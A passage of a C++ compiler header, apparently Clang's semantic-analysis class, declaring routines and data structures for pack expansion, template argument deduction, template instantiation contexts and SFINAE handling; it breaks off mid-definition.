/// \param Pattern The expression preceding the ellipsis, which will become
/// the pattern of the pack expansion.
///
/// \param EllipsisLoc The location of the ellipsis.
ExprResult ActOnPackExpansion(Expr *Pattern, SourceLocation EllipsisLoc);
/// Invoked when parsing an expression followed by an ellipsis, which
/// creates a pack expansion.
///
/// \param Pattern The expression preceding the ellipsis, which will become
/// the pattern of the pack expansion.
///
/// \param EllipsisLoc The location of the ellipsis.
ExprResult CheckPackExpansion(Expr *Pattern, SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions);
/// Determine whether we could expand a pack expansion with the
/// given set of parameter packs into separate arguments by repeatedly
/// transforming the pattern.
///
/// \param EllipsisLoc The location of the ellipsis that identifies the
/// pack expansion.
///
/// \param PatternRange The source range that covers the entire pattern of
/// the pack expansion.
///
/// \param Unexpanded The set of unexpanded parameter packs within the
/// pattern.
///
/// \param ShouldExpand Will be set to \c true if the transformer should
/// expand the corresponding pack expansions into separate arguments. When
/// set, \c NumExpansions must also be set.
///
/// \param RetainExpansion Whether the caller should add an unexpanded
/// pack expansion after all of the expanded arguments. This is used
/// when extending explicitly-specified template argument packs per
/// C++0x [temp.arg.explicit]p9.
///
/// \param NumExpansions The number of separate arguments that will be in
/// the expanded form of the corresponding pack expansion. This is both an
/// input and an output parameter, which can be set by the caller if the
/// number of expansions is known a priori (e.g., due to a prior substitution)
/// and will be set by the callee when the number of expansions is known.
/// The callee must set this value when \c ShouldExpand is \c true; it may
/// set this value in other cases.
///
/// \returns true if an error occurred (e.g., because the parameter packs
/// are to be instantiated with arguments of different lengths), false
/// otherwise. If false, \c ShouldExpand (and possibly \c NumExpansions)
/// must be set.
bool CheckParameterPacksForExpansion(SourceLocation EllipsisLoc,
SourceRange PatternRange,
ArrayRef<UnexpandedParameterPack> Unexpanded,
const MultiLevelTemplateArgumentList &TemplateArgs,
bool &ShouldExpand,
bool &RetainExpansion,
Optional<unsigned> &NumExpansions);
/// Determine the number of arguments in the given pack expansion
/// type.
///
/// This routine assumes that the number of arguments in the expansion is
/// consistent across all of the unexpanded parameter packs in its pattern.
///
/// Returns an empty Optional if the type can't be expanded.
Optional<unsigned> getNumArgumentsInExpansion(QualType T,
const MultiLevelTemplateArgumentList &TemplateArgs);
/// Determine whether the given declarator contains any unexpanded
/// parameter packs.
///
/// This routine is used by the parser to disambiguate function declarators
/// with an ellipsis prior to the ')', e.g.,
///
/// \code
/// void f(T...);
/// \endcode
///
/// To determine whether we have an (unnamed) function parameter pack or
/// a variadic function.
///
/// \returns true if the declarator contains any unexpanded parameter packs,
/// false otherwise.
bool containsUnexpandedParameterPacks(Declarator &D);
/// Returns the pattern of the pack expansion for a template argument.
///
/// \param OrigLoc The template argument to expand.
///
/// \param Ellipsis Will be set to the location of the ellipsis.
///
/// \param NumExpansions Will be set to the number of expansions that will
/// be generated from this pack expansion, if known a priori.
TemplateArgumentLoc getTemplateArgumentPackExpansionPattern(
TemplateArgumentLoc OrigLoc,
SourceLocation &Ellipsis,
Optional<unsigned> &NumExpansions) const;
/// Given a template argument that contains an unexpanded parameter pack, but
/// which has already been substituted, attempt to determine the number of
/// elements that will be produced once this argument is fully-expanded.
///
/// This is intended for use when transforming 'sizeof...(Arg)' in order to
/// avoid actually expanding the pack where possible.
Optional<unsigned> getFullyPackExpandedSize(TemplateArgument Arg);
//===--------------------------------------------------------------------===//
// C++ Template Argument Deduction (C++ [temp.deduct])
//===--------------------------------------------------------------------===//
/// Adjust the type \p ArgFunctionType to match the calling convention,
/// noreturn, and optionally the exception specification of \p FunctionType.
/// Deduction often wants to ignore these properties when matching function
/// types.
QualType adjustCCAndNoReturn(QualType ArgFunctionType, QualType FunctionType,
bool AdjustExceptionSpec = false);
/// Describes the result of template argument deduction.
///
/// The TemplateDeductionResult enumeration describes the result of
/// template argument deduction, as returned from
/// DeduceTemplateArguments(). The separate TemplateDeductionInfo
/// structure provides additional information about the results of
/// template argument deduction, e.g., the deduced template argument
/// list (if successful) or the specific template parameters or
/// deduced arguments that were involved in the failure.
enum TemplateDeductionResult {
/// Template argument deduction was successful.
TDK_Success = 0,
/// The declaration was invalid; do nothing.
TDK_Invalid,
/// Template argument deduction exceeded the maximum template
/// instantiation depth (which has already been diagnosed).
TDK_InstantiationDepth,
/// Template argument deduction did not deduce a value
/// for every template parameter.
TDK_Incomplete,
/// Template argument deduction did not deduce a value for every
/// expansion of an expanded template parameter pack.
TDK_IncompletePack,
/// Template argument deduction produced inconsistent
/// deduced values for the given template parameter.
TDK_Inconsistent,
/// Template argument deduction failed due to inconsistent
/// cv-qualifiers on a template parameter type that would
/// otherwise be deduced, e.g., we tried to deduce T in "const T"
/// but were given a non-const "X".
TDK_Underqualified,
/// Substitution of the deduced template argument values
/// resulted in an error.
TDK_SubstitutionFailure,
/// After substituting deduced template arguments, a dependent
/// parameter type did not match the corresponding argument.
TDK_DeducedMismatch,
/// After substituting deduced template arguments, an element of
/// a dependent parameter type did not match the corresponding element
/// of the corresponding argument (when deducing from an initializer list).
TDK_DeducedMismatchNested,
/// A non-depnedent component of the parameter did not match the
/// corresponding component of the argument.
TDK_NonDeducedMismatch,
/// When performing template argument deduction for a function
/// template, there were too many call arguments.
TDK_TooManyArguments,
/// When performing template argument deduction for a function
/// template, there were too few call arguments.
TDK_TooFewArguments,
/// The explicitly-specified template arguments were not valid
/// template arguments for the given template.
TDK_InvalidExplicitArguments,
/// Checking non-dependent argument conversions failed.
TDK_NonDependentConversionFailure,
/// The deduced arguments did not satisfy the constraints associated
/// with the template.
TDK_ConstraintsNotSatisfied,
/// Deduction failed; that's all we know.
TDK_MiscellaneousDeductionFailure,
/// CUDA Target attributes do not match.
TDK_CUDATargetMismatch
};
TemplateDeductionResult
DeduceTemplateArguments(ClassTemplatePartialSpecializationDecl *Partial,
const TemplateArgumentList &TemplateArgs,
sema::TemplateDeductionInfo &Info);
TemplateDeductionResult
DeduceTemplateArguments(VarTemplatePartialSpecializationDecl *Partial,
const TemplateArgumentList &TemplateArgs,
sema::TemplateDeductionInfo &Info);
TemplateDeductionResult SubstituteExplicitTemplateArguments(
FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo &ExplicitTemplateArgs,
SmallVectorImpl<DeducedTemplateArgument> &Deduced,
SmallVectorImpl<QualType> &ParamTypes, QualType *FunctionType,
sema::TemplateDeductionInfo &Info);
/// brief A function argument from which we performed template argument
// deduction for a call.
struct OriginalCallArg {
OriginalCallArg(QualType OriginalParamType, bool DecomposedParam,
unsigned ArgIdx, QualType OriginalArgType)
: OriginalParamType(OriginalParamType),
DecomposedParam(DecomposedParam), ArgIdx(ArgIdx),
OriginalArgType(OriginalArgType) {}
QualType OriginalParamType;
bool DecomposedParam;
unsigned ArgIdx;
QualType OriginalArgType;
};
TemplateDeductionResult FinishTemplateArgumentDeduction(
FunctionTemplateDecl *FunctionTemplate,
SmallVectorImpl<DeducedTemplateArgument> &Deduced,
unsigned NumExplicitlySpecified, FunctionDecl *&Specialization,
sema::TemplateDeductionInfo &Info,
SmallVectorImpl<OriginalCallArg> const *OriginalCallArgs = nullptr,
bool PartialOverloading = false,
llvm::function_ref<bool()> CheckNonDependent = []{ return false; });
TemplateDeductionResult DeduceTemplateArguments(
FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo *ExplicitTemplateArgs, ArrayRef<Expr *> Args,
FunctionDecl *&Specialization, sema::TemplateDeductionInfo &Info,
bool PartialOverloading,
llvm::function_ref<bool(ArrayRef<QualType>)> CheckNonDependent);
TemplateDeductionResult
DeduceTemplateArguments(FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo *ExplicitTemplateArgs,
QualType ArgFunctionType,
FunctionDecl *&Specialization,
sema::TemplateDeductionInfo &Info,
bool IsAddressOfFunction = false);
TemplateDeductionResult
DeduceTemplateArguments(FunctionTemplateDecl *FunctionTemplate,
QualType ToType,
CXXConversionDecl *&Specialization,
sema::TemplateDeductionInfo &Info);
TemplateDeductionResult
DeduceTemplateArguments(FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo *ExplicitTemplateArgs,
FunctionDecl *&Specialization,
sema::TemplateDeductionInfo &Info,
bool IsAddressOfFunction = false);
/// Substitute Replacement for \p auto in \p TypeWithAuto
QualType SubstAutoType(QualType TypeWithAuto, QualType Replacement);
/// Substitute Replacement for auto in TypeWithAuto
TypeSourceInfo* SubstAutoTypeSourceInfo(TypeSourceInfo *TypeWithAuto,
QualType Replacement);
/// Completely replace the \c auto in \p TypeWithAuto by
/// \p Replacement. This does not retain any \c auto type sugar.
QualType ReplaceAutoType(QualType TypeWithAuto, QualType Replacement);
/// Result type of DeduceAutoType.
enum DeduceAutoResult {
DAR_Succeeded,
DAR_Failed,
DAR_FailedAlreadyDiagnosed
};
DeduceAutoResult
DeduceAutoType(TypeSourceInfo *AutoType, Expr *&Initializer, QualType &Result,
Optional<unsigned> DependentDeductionDepth = None,
bool IgnoreConstraints = false);
DeduceAutoResult
DeduceAutoType(TypeLoc AutoTypeLoc, Expr *&Initializer, QualType &Result,
Optional<unsigned> DependentDeductionDepth = None,
bool IgnoreConstraints = false);
void DiagnoseAutoDeductionFailure(VarDecl *VDecl, Expr *Init);
bool DeduceReturnType(FunctionDecl *FD, SourceLocation Loc,
bool Diagnose = true);
/// Declare implicit deduction guides for a class template if we've
/// not already done so.
void DeclareImplicitDeductionGuides(TemplateDecl *Template,
SourceLocation Loc);
QualType DeduceTemplateSpecializationFromInitializer(
TypeSourceInfo *TInfo, const InitializedEntity &Entity,
const InitializationKind &Kind, MultiExprArg Init);
QualType deduceVarTypeFromInitializer(VarDecl *VDecl, DeclarationName Name,
QualType Type, TypeSourceInfo *TSI,
SourceRange Range, bool DirectInit,
Expr *Init);
TypeLoc getReturnTypeLoc(FunctionDecl *FD) const;
bool DeduceFunctionTypeFromReturnExpr(FunctionDecl *FD,
SourceLocation ReturnLoc,
Expr *&RetExpr, AutoType *AT);
FunctionTemplateDecl *getMoreSpecializedTemplate(
FunctionTemplateDecl *FT1, FunctionTemplateDecl *FT2, SourceLocation Loc,
TemplatePartialOrderingContext TPOC, unsigned NumCallArguments1,
unsigned NumCallArguments2, bool Reversed = false);
UnresolvedSetIterator
getMostSpecialized(UnresolvedSetIterator SBegin, UnresolvedSetIterator SEnd,
TemplateSpecCandidateSet &FailedCandidates,
SourceLocation Loc,
const PartialDiagnostic &NoneDiag,
const PartialDiagnostic &AmbigDiag,
const PartialDiagnostic &CandidateDiag,
bool Complain = true, QualType TargetType = QualType());
ClassTemplatePartialSpecializationDecl *
getMoreSpecializedPartialSpecialization(
ClassTemplatePartialSpecializationDecl *PS1,
ClassTemplatePartialSpecializationDecl *PS2,
SourceLocation Loc);
bool isMoreSpecializedThanPrimary(ClassTemplatePartialSpecializationDecl *T,
sema::TemplateDeductionInfo &Info);
VarTemplatePartialSpecializationDecl *getMoreSpecializedPartialSpecialization(
VarTemplatePartialSpecializationDecl *PS1,
VarTemplatePartialSpecializationDecl *PS2, SourceLocation Loc);
bool isMoreSpecializedThanPrimary(VarTemplatePartialSpecializationDecl *T,
sema::TemplateDeductionInfo &Info);
bool isTemplateTemplateParameterAtLeastAsSpecializedAs(
TemplateParameterList *PParam, TemplateDecl *AArg, SourceLocation Loc);
void MarkUsedTemplateParameters(const Expr *E, bool OnlyDeduced,
unsigned Depth, llvm::SmallBitVector &Used);
void MarkUsedTemplateParameters(const TemplateArgumentList &TemplateArgs,
bool OnlyDeduced,
unsigned Depth,
llvm::SmallBitVector &Used);
void MarkDeducedTemplateParameters(
const FunctionTemplateDecl *FunctionTemplate,
llvm::SmallBitVector &Deduced) {
return MarkDeducedTemplateParameters(Context, FunctionTemplate, Deduced);
}
static void MarkDeducedTemplateParameters(ASTContext &Ctx,
const FunctionTemplateDecl *FunctionTemplate,
llvm::SmallBitVector &Deduced);
//===--------------------------------------------------------------------===//
// C++ Template Instantiation
//
MultiLevelTemplateArgumentList
getTemplateInstantiationArgs(NamedDecl *D,
const TemplateArgumentList *Innermost = nullptr,
bool RelativeToPrimary = false,
const FunctionDecl *Pattern = nullptr);
/// A context in which code is being synthesized (where a source location
/// alone is not sufficient to identify the context). This covers template
/// instantiation and various forms of implicitly-generated functions.
struct CodeSynthesisContext {
/// The kind of template instantiation we are performing
enum SynthesisKind {
/// We are instantiating a template declaration. The entity is
/// the declaration we're instantiating (e.g., a CXXRecordDecl).
TemplateInstantiation,
/// We are instantiating a default argument for a template
/// parameter. The Entity is the template parameter whose argument is
/// being instantiated, the Template is the template, and the
/// TemplateArgs/NumTemplateArguments provide the template arguments as
/// specified.
DefaultTemplateArgumentInstantiation,
/// We are instantiating a default argument for a function.
/// The Entity is the ParmVarDecl, and TemplateArgs/NumTemplateArgs
/// provides the template arguments as specified.
DefaultFunctionArgumentInstantiation,
/// We are substituting explicit template arguments provided for
/// a function template. The entity is a FunctionTemplateDecl.
ExplicitTemplateArgumentSubstitution,
/// We are substituting template argument determined as part of
/// template argument deduction for either a class template
/// partial specialization or a function template. The
/// Entity is either a {Class|Var}TemplatePartialSpecializationDecl or
/// a TemplateDecl.
DeducedTemplateArgumentSubstitution,
/// We are substituting prior template arguments into a new
/// template parameter. The template parameter itself is either a
/// NonTypeTemplateParmDecl or a TemplateTemplateParmDecl.
PriorTemplateArgumentSubstitution,
/// We are checking the validity of a default template argument that
/// has been used when naming a template-id.
DefaultTemplateArgumentChecking,
/// We are computing the exception specification for a defaulted special
/// member function.
ExceptionSpecEvaluation,
/// We are instantiating the exception specification for a function
/// template which was deferred until it was needed.
ExceptionSpecInstantiation,
/// We are instantiating a requirement of a requires expression.
RequirementInstantiation,
/// We are checking the satisfaction of a nested requirement of a requires
/// expression.
NestedRequirementConstraintsCheck,
/// We are declaring an implicit special member function.
DeclaringSpecialMember,
/// We are declaring an implicit 'operator==' for a defaulted
/// 'operator<=>'.
DeclaringImplicitEqualityComparison,
/// We are defining a synthesized function (such as a defaulted special
/// member).
DefiningSynthesizedFunction,
// We are checking the constraints associated with a constrained entity or
// the constraint expression of a concept. This includes the checks that
// atomic constraints have the type 'bool' and that they can be constant
// evaluated.
ConstraintsCheck,
// We are substituting template arguments into a constraint expression.
ConstraintSubstitution,
// We are normalizing a constraint expression.
ConstraintNormalization,
// We are substituting into the parameter mapping of an atomic constraint
// during normalization.
ParameterMappingSubstitution,
/// We are rewriting a comparison operator in terms of an operator<=>.
RewritingOperatorAsSpaceship,
/// Added for Template instantiation observation.
/// Memoization means we are _not_ instantiating a template because
/// it is already instantiated (but we entered a context where we
/// would have had to if it was not already instantiated).
Memoization
} Kind;
/// Was the enclosing context a non-instantiation SFINAE context?
bool SavedInNonInstantiationSFINAEContext;
/// The point of instantiation or synthesis within the source code.
SourceLocation PointOfInstantiation;
/// The entity that is being synthesized.
Decl *Entity;
/// The template (or partial specialization) in which we are
/// performing the instantiation, for substitutions of prior template
/// arguments.
NamedDecl *Template;
/// The list of template arguments we are substituting, if they
/// are not part of the entity.
const TemplateArgument *TemplateArgs;
// FIXME: Wrap this union around more members, or perhaps store the
// kind-specific members in the RAII object owning the context.
union {
/// The number of template arguments in TemplateArgs.
unsigned NumTemplateArgs;
/// The special member being declared or defined.
CXXSpecialMember SpecialMember;
};
ArrayRef<TemplateArgument> template_arguments() const {
assert(Kind != DeclaringSpecialMember);
return {TemplateArgs, NumTemplateArgs};
}
/// The template deduction info object associated with the
/// substitution or checking of explicit or deduced template arguments.
sema::TemplateDeductionInfo *DeductionInfo;
/// The source range that covers the construct that cause
/// the instantiation, e.g., the template-id that causes a class
/// template instantiation.
SourceRange InstantiationRange;
CodeSynthesisContext()
: Kind(TemplateInstantiation),
SavedInNonInstantiationSFINAEContext(false), Entity(nullptr),
Template(nullptr), TemplateArgs(nullptr), NumTemplateArgs(0),
DeductionInfo(nullptr) {}
/// Determines whether this template is an actual instantiation
/// that should be counted toward the maximum instantiation depth.
bool isInstantiationRecord() const;
};
/// List of active code synthesis contexts.
///
/// This vector is treated as a stack. As synthesis of one entity requires
/// synthesis of another, additional contexts are pushed onto the stack.
SmallVector<CodeSynthesisContext, 16> CodeSynthesisContexts;
/// Specializations whose definitions are currently being instantiated.
llvm::DenseSet<std::pair<Decl *, unsigned>> InstantiatingSpecializations;
/// Non-dependent types used in templates that have already been instantiated
/// by some template instantiation.
llvm::DenseSet<QualType> InstantiatedNonDependentTypes;
/// Extra modules inspected when performing a lookup during a template
/// instantiation. Computed lazily.
SmallVector<Module*, 16> CodeSynthesisContextLookupModules;
/// Cache of additional modules that should be used for name lookup
/// within the current template instantiation. Computed lazily; use
/// getLookupModules() to get a complete set.
llvm::DenseSet<Module*> LookupModulesCache;
/// Get the set of additional modules that should be checked during
/// name lookup. A module and its imports become visible when instanting a
/// template defined within it.
llvm::DenseSet<Module*> &getLookupModules();
/// Map from the most recent declaration of a namespace to the most
/// recent visible declaration of that namespace.
llvm::DenseMap<NamedDecl*, NamedDecl*> VisibleNamespaceCache;
/// Whether we are in a SFINAE context that is not associated with
/// template instantiation.
///
/// This is used when setting up a SFINAE trap (\c see SFINAETrap) outside
/// of a template instantiation or template argument deduction.
bool InNonInstantiationSFINAEContext;
/// The number of \p CodeSynthesisContexts that are not template
/// instantiations and, therefore, should not be counted as part of the
/// instantiation depth.
///
/// When the instantiation depth reaches the user-configurable limit
/// \p LangOptions::InstantiationDepth we will abort instantiation.
// FIXME: Should we have a similar limit for other forms of synthesis?
unsigned NonInstantiationEntries;
/// The depth of the context stack at the point when the most recent
/// error or warning was produced.
///
/// This value is used to suppress printing of redundant context stacks
/// when there are multiple errors or warnings in the same instantiation.
// FIXME: Does this belong in Sema? It's tough to implement it anywhere else.
unsigned LastEmittedCodeSynthesisContextDepth = 0;
/// The template instantiation callbacks to trace or track
/// instantiations (objects can be chained).
///
/// This callbacks is used to print, trace or track template
/// instantiations as they are being constructed.
std::vector<std::unique_ptr<TemplateInstantiationCallback>>
TemplateInstCallbacks;
/// The current index into pack expansion arguments that will be
/// used for substitution of parameter packs.
///
/// The pack expansion index will be -1 to indicate that parameter packs
/// should be instantiated as themselves. Otherwise, the index specifies
/// which argument within the parameter pack will be used for substitution.
int ArgumentPackSubstitutionIndex;
/// RAII object used to change the argument pack substitution index
/// within a \c Sema object.
///
/// See \c ArgumentPackSubstitutionIndex for more information.
class ArgumentPackSubstitutionIndexRAII {
Sema &Self;
int OldSubstitutionIndex;
public:
ArgumentPackSubstitutionIndexRAII(Sema &Self, int NewSubstitutionIndex)
: Self(Self), OldSubstitutionIndex(Self.ArgumentPackSubstitutionIndex) {
Self.ArgumentPackSubstitutionIndex = NewSubstitutionIndex;
}
~ArgumentPackSubstitutionIndexRAII() {
Self.ArgumentPackSubstitutionIndex = OldSubstitutionIndex;
}
};
friend class ArgumentPackSubstitutionRAII;
/// For each declaration that involved template argument deduction, the
/// set of diagnostics that were suppressed during that template argument
/// deduction.
///
/// FIXME: Serialize this structure to the AST file.
typedef llvm::DenseMap<Decl *, SmallVector<PartialDiagnosticAt, 1> >
SuppressedDiagnosticsMap;
SuppressedDiagnosticsMap SuppressedDiagnostics;
/// A stack object to be created when performing template
/// instantiation.
///
/// Construction of an object of type \c InstantiatingTemplate
/// pushes the current instantiation onto the stack of active
/// instantiations. If the size of this stack exceeds the maximum
/// number of recursive template instantiations, construction
/// produces an error and evaluates true.
///
/// Destruction of this object will pop the named instantiation off
/// the stack.
struct InstantiatingTemplate {
/// Note that we are instantiating a class template,
/// function template, variable template, alias template,
/// or a member thereof.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
Decl *Entity,
SourceRange InstantiationRange = SourceRange());
struct ExceptionSpecification {};
/// Note that we are instantiating an exception specification
/// of a function template.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
FunctionDecl *Entity, ExceptionSpecification,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating a default argument in a
/// template-id.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
TemplateParameter Param, TemplateDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange = SourceRange());
/// Note that we are substituting either explicitly-specified or
/// deduced template arguments during function template argument deduction.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
FunctionTemplateDecl *FunctionTemplate,
ArrayRef<TemplateArgument> TemplateArgs,
CodeSynthesisContext::SynthesisKind Kind,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating as part of template
/// argument deduction for a class template declaration.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
TemplateDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating as part of template
/// argument deduction for a class template partial
/// specialization.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ClassTemplatePartialSpecializationDecl *PartialSpec,
ArrayRef<TemplateArgument> TemplateArgs,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating as part of template
/// argument deduction for a variable template partial
/// specialization.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
VarTemplatePartialSpecializationDecl *PartialSpec,
ArrayRef<TemplateArgument> TemplateArgs,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating a default argument for a function
/// parameter.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ParmVarDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange = SourceRange());
/// Note that we are substituting prior template arguments into a
/// non-type parameter.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
NamedDecl *Template,
NonTypeTemplateParmDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
/// Note that we are substituting prior template arguments into a
/// template template parameter.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
NamedDecl *Template,
TemplateTemplateParmDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
/// Note that we are checking the default template argument
/// against the template parameter for a given template-id.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
TemplateDecl *Template,
NamedDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
struct ConstraintsCheck {};
/// \brief Note that we are checking the constraints associated with some
/// constrained entity (a concept declaration or a template with associated
/// constraints).
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ConstraintsCheck, NamedDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
struct ConstraintSubstitution {};
/// \brief Note that we are checking a constraint expression associated
/// with a template declaration or as part of the satisfaction check of a
/// concept.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ConstraintSubstitution, NamedDecl *Template,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange);
struct ConstraintNormalization {};
/// \brief Note that we are normalizing a constraint expression.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ConstraintNormalization, NamedDecl *Template,
SourceRange InstantiationRange);
struct ParameterMappingSubstitution {};
/// \brief Note that we are subtituting into the parameter mapping of an
/// atomic constraint during constraint normalization.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ParameterMappingSubstitution, NamedDecl *Template,
SourceRange InstantiationRange);
/// \brief Note that we are substituting template arguments into a part of
/// a requirement of a requires expression.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
concepts::Requirement *Req,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// \brief Note that we are checking the satisfaction of the constraint
/// expression inside of a nested requirement.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
concepts::NestedRequirement *Req, ConstraintsCheck,
SourceRange InstantiationRange = SourceRange());
/// Note that we have finished instantiating this template.
void Clear();
~InstantiatingTemplate() { Clear(); }
/// Determines whether we have exceeded the maximum
/// recursive template instantiations.
bool isInvalid() const { return Invalid; }
/// Determine whether we are already instantiating this
/// specialization in some surrounding active instantiation.
bool isAlreadyInstantiating() const { return AlreadyInstantiating; }
private:
Sema &SemaRef;
bool Invalid;
bool AlreadyInstantiating;
bool CheckInstantiationDepth(SourceLocation PointOfInstantiation,
SourceRange InstantiationRange);
InstantiatingTemplate(
Sema &SemaRef, CodeSynthesisContext::SynthesisKind Kind,
SourceLocation PointOfInstantiation, SourceRange InstantiationRange,
Decl *Entity, NamedDecl *Template = nullptr,
ArrayRef<TemplateArgument> TemplateArgs = None,
sema::TemplateDeductionInfo *DeductionInfo = nullptr);
InstantiatingTemplate(const InstantiatingTemplate&) = delete;
InstantiatingTemplate&
operator=(const InstantiatingTemplate&) = delete;
};
void pushCodeSynthesisContext(CodeSynthesisContext Ctx);
void popCodeSynthesisContext();
/// Determine whether we are currently performing template instantiation.
bool inTemplateInstantiation() const {
return CodeSynthesisContexts.size() > NonInstantiationEntries;
}
void PrintContextStack() {
if (!CodeSynthesisContexts.empty() &&
CodeSynthesisContexts.size() != LastEmittedCodeSynthesisContextDepth) {
PrintInstantiationStack();
LastEmittedCodeSynthesisContextDepth = CodeSynthesisContexts.size();
}
if (PragmaAttributeCurrentTargetDecl)
PrintPragmaAttributeInstantiationPoint();
}
void PrintInstantiationStack();
void PrintPragmaAttributeInstantiationPoint();
/// Determines whether we are currently in a context where
/// template argument substitution failures are not considered
/// errors.
///
/// \returns An empty \c Optional if we're not in a SFINAE context.
/// Otherwise, contains a pointer that, if non-NULL, contains the nearest
/// template-deduction context object, which can be used to capture
/// diagnostics that will be suppressed.
Optional<sema::TemplateDeductionInfo *> isSFINAEContext() const;
/// Determines whether we are currently in a context that
/// is not evaluated as per C++ [expr] p5.
bool isUnevaluatedContext() const {
assert(!ExprEvalContexts.empty() &&
"Must be in an expression evaluation context");
return ExprEvalContexts.back().isUnevaluated();
}
/// RAII class used to determine whether SFINAE has
/// trapped any errors that occur during template argument
/// deduction.
class SFINAETrap {
Sema &SemaRef;
unsigned PrevSFINAEErrors;
bool PrevInNonInstantiationSFINAEContext;
bool PrevAccessCheckingSFINAE;
bool PrevLastDiagnosticIgnored;
public:
explicit SFINAETrap(Sema &SemaRef, bool AccessCheckingSFINAE = false)
: SemaRef(SemaRef), PrevSFINAEErrors(SemaRef.NumSFINAEErrors),
PrevInNonInstantiationSFINAEContext(
SemaRef.InNonInstantiationSFINAEContext),
PrevAccessCheckingSFINAE(SemaRef.AccessCheckingSFINAE),
PrevLastDiagnosticIgnored(
SemaRef.getDiagnostics().isLastDiagnosticIgnored())
{
if (!SemaRef.isSFINAEContext())
SemaRef.InNonInstantiationSFINAEContext = true;
SemaRef.AccessCheckingSFINAE = AccessCheckingSFINAE;
}
~SFINAETrap() {
SemaRef.NumSFINAEErrors = PrevSFINAEErrors;
SemaRef.InNonInstantiationSFINAEContext
= PrevInNonInstantiationSFINAEContext;
SemaRef.AccessCheckingSFINAE = PrevAccessCheckingSFINAE;
SemaRef.getDiagnostics().setLastDiagnosticIgnored(
PrevLastDiagnosticIgnored);
}
/// Determine whether any SFINAE errors have been trapped.
bool hasErrorOccurred() const {
return SemaRef.NumSFINAEErrors > PrevSFINAEErrors;
}
};
/// RAII class used to indicate that we are performing provisional
/// semantic analysis to determine the validity of a construct, so
/// typo-correction and diagnostics in the immediate context (not within
/// implicitly-instantiated templates) should be suppressed.
class TentativeAnalysisScope {
Sema &SemaRef;
// FIXME: Using a SFINAETrap for this is a hack.
SFINAETrap Trap;
bool PrevDisableTypoCorrection;
public:
explicit TentativeAnalysisScope(Sema &SemaRef)
: SemaRef(SemaRef), Trap(SemaRef, true),
PrevDisableTypoCorrection(SemaRef.DisableTypoCorrection) {
SemaRef.DisableTypoCorrection = true;
}
~TentativeAnalysisScope() {
SemaRef.DisableTypoCorrection = PrevDisableTypoCorrection;
}
};
/// The current instantiation scope used to store local
/// variables.
LocalInstantiationScope *CurrentInstantiationScope;
/// Tracks whether we are in a context where typo correction is
/// disabled.
bool DisableTypoCorrection;
/// The number of typos corrected by CorrectTypo.
unsigned TyposCorrected;
typedef llvm::SmallSet<SourceLocation, 2> SrcLocSet;
typedef llvm::DenseMap<IdentifierInfo *, SrcLocSet> IdentifierSourceLocations;
/// A cache containing identifiers for which typo correction failed and
/// their locations, so that repeated attempts to correct an identifier in a
/// given location are ignored if typo correction already failed for it.
IdentifierSourceLocations TypoCorrectionFailures;
/// Worker object for performing CFG-based warnings.
sema::AnalysisBasedWarnings AnalysisWarnings;
threadSafety::BeforeSet *ThreadSafetyDeclCache;
/// An entity for which implicit template instantiation is required.
///
/// The source location associated with the declaration is the first place in
/// the source code where the declaration was "used". It is not necessarily
/// the point of instantiation (which will be either before or after the
/// namespace-scope declaration that triggered this implicit instantiation),
/// However, it is the location that diagnostics should generally refer to,
/// because users will need to know what code triggered the instantiation.
typedef std::pair<ValueDecl *, SourceLocation> PendingImplicitInstantiation;
/// The queue of implicit template instantiations that are required
/// but have not yet been performed.
std::deque<PendingImplicitInstantiation> PendingInstantiations;
/// Queue of implicit template instantiations that cannot be performed
/// eagerly.
SmallVector<PendingImplicitInstantiation, 1> LateParsedInstantiations;
class GlobalEagerInstantiationScope {
public:
GlobalEagerInstantiationScope(Sema &S, bool Enabled)
: S(S), Enabled(Enabled) {
if (!Enabled) return;
SavedPendingInstantiations.swap(S.PendingInstantiations);
SavedVTableUses.swap(S.VTableUses);
}
void perform() {
